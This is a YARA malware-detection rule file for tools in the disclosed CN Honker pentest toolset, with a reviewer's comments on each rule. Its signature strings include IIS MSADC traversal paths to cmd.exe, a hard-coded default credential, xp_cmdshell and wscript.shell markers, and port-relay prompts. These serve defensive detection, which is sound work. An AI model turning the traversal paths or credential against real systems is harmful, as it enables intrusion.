rule CN_Honker_Pk_Pker {
|
||
|
// Review: $s6 ("Report.dat") is a fullword substring of $s7 (".\Report.dat"),
// so every $s7 match also satisfies $s6 and the "5 of them" threshold is in
// practice 4 distinct indicators whenever $s7 hits. $s1/$s2 are the classic
// MSADC "..%5c" / "..\" traversal paths to cmd.exe on IIS. $s7 is also used by
// CN_Honker_ScanHistory above.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Pker.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "631787f27f27c46f79e58e1accfcc9ecfb4d3a2f"
|
||
|
id = "dff0e4fb-6b2e-5fa8-910d-63a9e5030b95"
|
||
|
strings:
|
||
|
// URL-encoded traversal variant.
$s1 = "/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
// Literal backslash traversal variant.
$s2 = "msadc/..\\..\\..\\..\\winnt/system32/cmd.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s3 = "--Made by VerKey&Only_Guest&Bincker" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s4 = ";APPLET;EMBED;FRAMESET;HEAD;NOFRAMES;NOSCRIPT;OBJECT;SCRIPT;STYLE;" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s5 = " --Welcome to Www.Pker.In Made by V.K" fullword wide
|
||
|
// Implied by $s7 (see note at the top of the rule).
$s6 = "Report.dat" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s7 = ".\\Report.dat" fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 500KB and 5 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_GetPass_GetPass {
|
||
|
// Review: the misspelled "Administuor" in $s2 is the strongest indicator
// here - a typo is unlikely to recur in unrelated software. $s1 is a build
// path fragment (a user named "only") and $s3 the tail of a batch pause
// prompt; all three are required.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file GetPass.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
|
||
|
id = "999d0ac0-a112-53db-9dbe-10fa4419cfae"
|
||
|
strings:
|
||
|
// Build/user path fragment.
$s1 = "\\only\\Desktop\\" ascii
|
||
|
// Note the typo - deliberate match on the author's spelling.
$s2 = "To Run As Administuor" ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "Key to EXIT ... & pause > nul" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 300KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_F4ck_Team_BlackMoon_Jun15 {
|
||
|
// Review: "4 of them" over seven strings. $s1/$s2 describe a user-add
// utility that works without net.exe (a Net API call, presumably - confirm),
// $s5 is a hard-coded "admin 123456789" credential pair, and $s3/$s6 are
// BlackMoon runtime markers that other programs built with the same
// tooling may also carry. $s4 "Team.F4ck.Net" is shared with
// CN_Honker_F4ck_Team_F4ck_3 below. old_rule_name is kept for history.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file f4ck.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
old_rule_name = "CN_Honker_F4ck_Team_f4ck_3"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "7e3bf9b26df08cfa10f10e2283c6f21f5a3a0014"
|
||
|
id = "df12daca-8e03-5382-b71d-96a747d3a043"
|
||
|
strings:
|
||
|
$s1 = "File UserName PassWord [comment] /add" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "No Net.exe Add User" fullword ascii
|
||
|
// Runtime marker, not tool-specific.
$s3 = "BlackMoon RunTime Error:" fullword ascii
|
||
|
$s4 = "Team.F4ck.Net" fullword wide
|
||
|
// Hard-coded default credential pair.
$s5 = "admin 123456789" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
// Runtime marker, not tool-specific.
$s6 = "blackmoon" fullword ascii
|
||
|
$s7 = "f4ck Team" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 100KB and 4 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_F4ck_Team_F4ck_3 {
|
||
|
// Review: "3 of them" over six strings, two of which are generic
// ($s2 "@Netapi32.dll", $s7 "DLL ERROR"); a combination such as
// $s2 + $s7 + $s6 would fire without any F4ck-branded string. If that
// proves noisy, require one of $s1/$s3/$s11 explicitly. $s3 is shared
// with the BlackMoon rule above.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file F4ck_3.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "0b3e9381930f02e170e484f12233bbeb556f3731"
|
||
|
id = "1767669f-47d0-5d6e-97a5-92522f988102"
|
||
|
strings:
|
||
|
$s1 = "F4ck.exe" fullword wide
|
||
|
// Generic import-style string.
$s2 = "@Netapi32.dll" fullword ascii
|
||
|
$s3 = "Team.F4ck.Net" fullword wide
|
||
|
$s6 = "NO Net Add User" fullword wide
|
||
|
// Generic error text.
$s7 = "DLL ERROR" fullword ascii
|
||
|
$s11 = "F4ck Team" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 100KB and 3 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_ACCESS_brute {
|
||
|
// Review: the strings are truncated fragments (".dns166.co", "ality/clsCom",
// "WINDOWS\Syswm") rather than whole identifiers, which suggests they were
// lifted from a partially packed or split section - confirm before editing
// any of them, as a re-packed sample may shift the fragment boundaries.
// All five are required and the file must be under 20KB.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file ACCESS_brute.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "f552e05facbeb21cb12f23c34bb1881c43e24c34"
|
||
|
id = "7ceaea93-4f23-50a3-ab39-8149b10ffdad"
|
||
|
strings:
|
||
|
$s1 = ".dns166.co" ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "SExecuteA" ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "ality/clsCom" ascii
|
||
|
$s4 = "NT_SINK_AddRef" ascii
|
||
|
$s5 = "WINDOWS\\Syswm" ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 20KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Fpipe_FPipe {
|
||
|
// Review: score is 50 rather than 70 because FPipe is a published
// Foundstone port-forwarding utility ($s2 is its vendor URL) - a dual-use
// tool rather than malware. Treat a hit as "port forwarder present" and
// judge it by where it was found and who dropped it.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file FPipe.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
// Lower than the rest of the set: legitimate dual-use tool.
score = 50
|
||
|
hash = "a2c51c6fa93a3dfa14aaf31fb1c48a3a66a32d11"
|
||
|
id = "0d84aa8f-dc15-5bb7-a568-224c6a837685"
|
||
|
strings:
|
||
|
$s1 = "Unable to create TCP listen socket. %s%d" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
// Vendor URL of the original tool.
$s2 = "http://www.foundstone.com" fullword ascii
|
||
|
$s3 = "%s %s port %d. Address is already in use" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 20KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Layer_Layer {
|
||
|
// Review: $s3 is a stock Firefox 26 user agent and carries little weight;
// the PDB path ($s1) and the original file name ($s2) are the specific
// parts, and all three are required. Rule was last modified 2022-12-21.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Layer.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
modified = "2022-12-21"
|
||
|
score = 70
|
||
|
hash = "0f4f27e842787cb854bd61f9aca86a63f653eb41"
|
||
|
id = "48e27119-da7e-5921-8d4f-f8a1e3ac0439"
|
||
|
strings:
|
||
|
// PDB path fragment - the most specific string here.
$s1 = "\\Release\\Layer.pdb" ascii
|
||
|
$s2 = "Layer.exe" fullword wide
|
||
|
// Generic user agent.
$s3 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0" fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 300KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_ms10048_x86 {
|
||
|
// Review: single-string rule - "all of them" here means just $s1, a status
// message from the MS10-048 exploit binary. The 30KB bound is doing real
// work; keep it if the string is ever loosened.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file ms10048-x86.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "e57b453966e4827e2effa4e153f2923e7d058702"
|
||
|
id = "5d572d35-d2e5-5457-89d9-fbce8f8fa552"
|
||
|
strings:
|
||
|
// Only indicator in this rule.
$s1 = "[+] Set to %d exploit half succeeded" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 30KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_HTran2_4 {
|
||
|
// Review: $s1 is the interactive mode prompt of the HTran connection
// bouncer (bind / connect-back / listen) and $s2 its new-connection log
// line. The same sample hash is also covered by the super rule
// CN_Honker__lcx_HTran2_4_htran20 below, so a hit may raise both.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file HTran2.4.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "524f986692f55620013ab5a06bf942382e64d38a"
|
||
|
id = "21cb5ec5-900d-5092-8c2b-2d951289957c"
|
||
|
strings:
|
||
|
$s1 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "[+] New connection %s:%d !!" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 180KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_SkinHRootkit_SkinH {
|
||
|
// Review: $s0 is a 360.cn copyright notice and $s2 names skinh.dll, a UI
// skinning library; both can occur in legitimate software, so the all-of
// condition together with $s1 is what keeps this specific. The sample hash
// is also covered by CN_Honker__builder_shift_SkinH below.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file SkinH.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "d593f03ae06e54b653c7850c872c0eed459b301f"
|
||
|
id = "8aedd01c-9dc8-537d-97ea-bc8de81edd3d"
|
||
|
strings:
|
||
|
// Copyright string of a legitimate vendor - weak on its own.
$s0 = "(C)360.cn Inc.All Rights Reserved." fullword wide
|
||
|
$s1 = "SDVersion.dll" fullword wide
|
||
|
// UI skin library name - weak on its own.
$s2 = "skinh.dll" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 2000KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker__PostgreSQL_mysql_injectV1_1_Creak_Oracle_SQLServer_inject_Creaked {
|
||
|
// Review: this is the only rule in the set without a filesize bound.
// $s2 is the default user agent of the Indy networking library and $s3 an
// Indy property name, so any Indy-based Delphi program carries both; the
// specificity rests entirely on the author e-mail in $s1. Adding a
// filesize cap (e.g. "filesize < <SIZE_TO_CONFIRM>KB") would bring it in
// line with the other rules and reduce scan cost on large files.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
super_rule = 1
|
||
|
hash0 = "1ecfaa91aae579cfccb8b7a8607176c82ec726f4"
|
||
|
hash1 = "a1f066789f48a76023598c5777752c15f91b76b0"
|
||
|
hash2 = "0264f4efdba09eaf1e681220ba96de8498ab3580"
|
||
|
hash3 = "af3c41756ec8768483a4cf59b2e639994426e2c2"
|
||
|
id = "0272776c-8dbe-5345-92c8-57593686a84c"
|
||
|
strings:
|
||
|
// Author e-mail - the only tool-specific string.
$s1 = "zhaoxypass@yahoo.com.cn" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
// Indy library default user agent - generic.
$s2 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
// Indy property name - generic.
$s3 = "ProxyParams.ProxyPort" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
// No filesize bound here (see note at the top of the rule).
uint16(0) == 0x5a4d and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker__wwwscan_wwwscan_wwwscan_gui {
|
||
|
// Review: $s1 is the request the scanner sends to learn a server's
// "not found" behaviour before brute-forcing paths - it is also a useful
// web-log signature on its own; $s2 is the CLI usage banner. Both required.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - from files wwwscan.exe, wwwscan.exe, wwwscan_gui.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
super_rule = 1
|
||
|
hash0 = "6dbffa916d0f0be2d34c8415592b9aba690634c7"
|
||
|
hash1 = "6bed45629c5e54986f2d27cbfc53464108911026"
|
||
|
hash2 = "897b66a34c58621190cb88e9b2a2a90bf9b71a53"
|
||
|
id = "02f80151-4dfb-5b14-9145-312a9bd2c609"
|
||
|
strings:
|
||
|
// 404-baseline probe; also visible in web server access logs.
$s1 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
|
||
|
$s2 = "<Usage>: %s <HostName|Ip> [Options]" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 200KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker__LPK_LPK_LPK {
|
||
|
// Review: $s3/$s4 are sethc.exe look-alike names (sathc / sothc) and $s5 a
// batch script name - artefacts of a sticky-keys (sethc) replacement kit;
// $s1 is the cmd.exe path it launches. hash1 is the same sample as
// CN_Honker_T00ls_Lpk_Sethc_v4_LPK above, so both rules may fire on it.
// On a live host, a renamed copy of sethc.exe in system32 is the thing to
// look for.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - from files LPK.DAT, LPK.DAT, LPK.DAT"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
super_rule = 1
|
||
|
hash0 = "5a1226e73daba516c889328f295e728f07fdf1c3"
|
||
|
// Same sample as CN_Honker_T00ls_Lpk_Sethc_v4_LPK.
hash1 = "2b2ab50753006f62965bba83460e3960ca7e1926"
|
||
|
hash2 = "cf2549bbbbdb7aaf232d9783873667e35c8d96c1"
|
||
|
id = "e1beb88b-d3e8-5868-affb-e59c26e4dc2e"
|
||
|
strings:
|
||
|
$s1 = "C:\\WINDOWS\\system32\\cmd.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = "Password error!" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
// sethc.exe look-alikes.
$s3 = "\\sathc.exe" ascii
|
||
|
$s4 = "\\sothc.exe" ascii
|
||
|
$s5 = "\\lpksethc.bat" ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 1057KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker__builder_shift_SkinH {
|
||
|
// Review: the strings are mangled fragments ("lipboard", "uxthem",
// "UtilW0ndow", "prog3am") that presumably come from a protected/obfuscated
// section; "ENIGMA" by itself looks like a protector marker that other
// packed binaries may share - confirm. Requiring all five is what keeps
// this from matching unrelated protected files. hash2 is the same sample
// as CN_Honker_SkinHRootkit_SkinH above.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - from files builder.exe, shift.exe, SkinH.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
super_rule = 1
|
||
|
hash0 = "6b5a84cdc3d27c435d49de3f68872d015a5aadfc"
|
||
|
hash1 = "ee127c1ea1e3b5bf3d2f8754fabf9d1101ed0ee0"
|
||
|
// Same sample as CN_Honker_SkinHRootkit_SkinH.
hash2 = "d593f03ae06e54b653c7850c872c0eed459b301f"
|
||
|
id = "cb18aa4a-6eba-58ca-a6fc-e4160b90f4d7"
|
||
|
strings:
|
||
|
$s1 = "lipboard" fullword ascii
|
||
|
$s2 = "uxthem" fullword ascii
|
||
|
// Possible protector marker - weak on its own.
$s3 = "ENIGMA" fullword ascii
|
||
|
$s4 = "UtilW0ndow" fullword ascii
|
||
|
$s5 = "prog3am" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 6075KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker__lcx_HTran2_4_htran20 {
|
||
|
// Review: the three strings are the relay's own log lines (connect error,
// socket-pair close, "Start Transmit" between two endpoints), which is why
// they cover lcx, HTran 2.4 and htran20 together. hash1 is also the single
// sample behind CN_Honker_HTran2_4 above, so a hit may raise both rules.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - from files lcx.exe, HTran2.4.exe, htran20.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
super_rule = 1
|
||
|
hash0 = "0c8779849d53d0772bbaa1cedeca150c543ebf38"
|
||
|
// Same sample as CN_Honker_HTran2_4.
hash1 = "524f986692f55620013ab5a06bf942382e64d38a"
|
||
|
hash2 = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
|
||
|
id = "c6851e7b-ab64-5578-896e-4d92fb3b2000"
|
||
|
strings:
|
||
|
$s1 = "[SERVER]connection to %s:%d error" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "[+] OK! I Closed The Two Socket." fullword ascii /* PEStudio Blacklist: strings */
|
||
|
// Relay banner: two address:port pairs being bridged.
$s3 = "[+] Start Transmit (%s:%d <-> %s:%d) ......" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 440KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker__D_injection_V2_32_D_injection_V2_32_D_injection_V2_32 {
|
||
|
// Review: hash0, hash1 and hash2 are identical, so this "super rule" was
// generated from the same file three times and is effectively a
// single-sample rule; the duplicate hashes could be collapsed. Also note
// that $s4 "[XP_CMDSHELL]" contains $s3 "XP_CMDSHELL" as a fullword
// substring (brackets are not word characters), so a $s4 match always
// satisfies $s3 and "4 of them" is in practice 3 distinct indicators plus
// $s3 whenever $s4 hits. $s5 is a dynamic-DNS host name.
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - from files D_injection_V2.32.exe, D_injection_V2.32.exe, D_injection_V2.32.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
super_rule = 1
|
||
|
// hash0 == hash1 == hash2 (see note at the top of the rule).
hash0 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
|
||
|
hash1 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
|
||
|
hash2 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
|
||
|
id = "79e9cd97-c070-5109-a0a0-bc88eea0dc37"
|
||
|
strings:
|
||
|
$s1 = "upfile.asp " fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "[wscript.shell]" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
// Implied by $s4 (fullword substring).
$s3 = "XP_CMDSHELL" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "[XP_CMDSHELL]" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
// Dynamic-DNS host name.
$s5 = "http://d99net.3322.org" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 10000KB and 4 of them
|
||
|
}
|